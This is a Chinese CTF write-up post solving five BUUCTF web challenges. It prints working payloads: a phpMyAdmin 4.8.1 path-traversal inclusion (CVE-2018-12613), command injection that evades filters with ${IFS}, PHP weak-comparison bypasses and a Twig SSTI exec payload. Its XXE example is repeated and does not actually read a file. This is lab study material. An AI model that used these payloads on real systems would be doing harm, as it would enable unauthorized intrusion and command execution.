BUUCTF-WEB(41-45)

[NCTF2019]Fake XML cookbook

代码处找到

题目也提示了是xxe,我们抓包搞一下

1. <?xml version="1.0" encoding="utf-8"?>
2. <!DOCTYPE hack [
3. <!ENTITY xxe "hack">]>
4. <user><username>&xxe;</username><password>123</password></user>

复制代码

然后我们就读取一下这个flag

1. <?xml version="1.0" encoding="utf-8"?>
2. <!DOCTYPE hack [
3. <!ENTITY xxe "hack">]>
4. <user><username>&xxe;</username><password>123</password></user>

复制代码

成功拿下flag

[GWCTF 2019]我有一个数据库

参考：
[BUUCTF GWCTF 2019] 我有一个数据库_buuctf我有有一个数据库-CSDN博客
扫描目录有一个robots.txt

1. phpinfo.php

复制代码

内里让我们去访问phpinfo.php
然后还有扫到phpmyadmin的目录，我们去访问一下
搜集到信息

然后搜版本号找到漏洞CVE-2018-12613phpMyAdmin 4.8.1背景文件包含漏洞（CVE-2018-12613）_phpmyadmin4.8.1 漏洞-CSDN博客

1. ?target=db_sql.php%253f/../../../../../../../../flag

复制代码

[BJDCTF2020]Mark loves cat

参考：[BJDCTF2020]Mark loves cat | 四种解法 (新解法：强类型比较绕过) - Nestar - 博客园 (cnblogs.com)
这边看到有git泄露

我就直接githack跑了一下
但是啊，我这边githack没啥用很奇怪，什么都没提取出来
然后我就在我本身的机器上跑，没在kali了

也是皇天不负有心人，终于得到了

然后我们打开flag.php确认了flag的位置

然后就打开了index.php

看着有点变量覆盖的味道，然后exit就是die

我们看看第二个条件
就是flag不被GET,POST赋值就输出yds这个变量，但是我们又想让$yds=$flag，那我们就可以利用这个GET这个方法
如果我们GET传入的是

1. yds=flag

复制代码

经过那个变量覆盖就是

1. $yds=$flag

复制代码

最后输出$yds的值，也就是flag，得到flag（这个回显是在这个网页的最左下角）

更多解法，大家可以看[BJDCTF2020]Mark loves cat | 四种解法 (新解法：强类型比较绕过) - Nestar - 博客园 (cnblogs.com)
[WUSTCTF2020]朴素无华

robots.txt发现一个文件

bp抓包后发现

我这里一直乱码

我这边利用了egde浏览器，然后下了一个扩展

来体现

第一层绕过就是

1. 科学计数法:经过本地测试，在php版本小于等于7.0.9时，intval("1e2")的结果是1，即转换字符串时，遇到字母停止，但是intval("1e2"+1)的结果却是101，这种特性可以绕过诸如intval($num)>2020&&intval($num)>2021。但是当php版本>7.0.9时，这种方法就失效了，因为intval("1e2")和intval(1e2)的值均为100。

复制代码

payload如下：

1. num=1e4

复制代码

第二层就是MD5弱比较只要本身字符串0e开头，MD5加密后还是0e开头就行

1. md5=0e215962017

复制代码

第三层
strstr那个判定就是我们不能有空白符，我们可以用${IFS}绕过
意思就是不能用cat

我们先ls看一下文件

1. ?num=1e4&md5=0e215962017&get_flag=ls

复制代码

然后查看文件

1. ?num=1e4&md5=0e215962017&get_flag=c''at${IFS}fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag

复制代码

[BJDCTF2020]Cookie is so stable

参考：
[buuctf-BJDCTF2020]Cookie is so stable(小宇特详解)_buuctf cookie is so stable-CSDN博客
upfine的博客 (cnblogs.com)
1. SSTI（模板注入）漏洞（入门篇） - bmjoker - 博客园 (cnblogs.com)
提示就是cookie，我们拿去解密一下，MD5解密，解不出来说明我有题目

然后就是SSTI，我输入了

1. {{7*7}}

复制代码

回显就是49，说明存在模板注入
payload：

1. user={{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}

复制代码

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。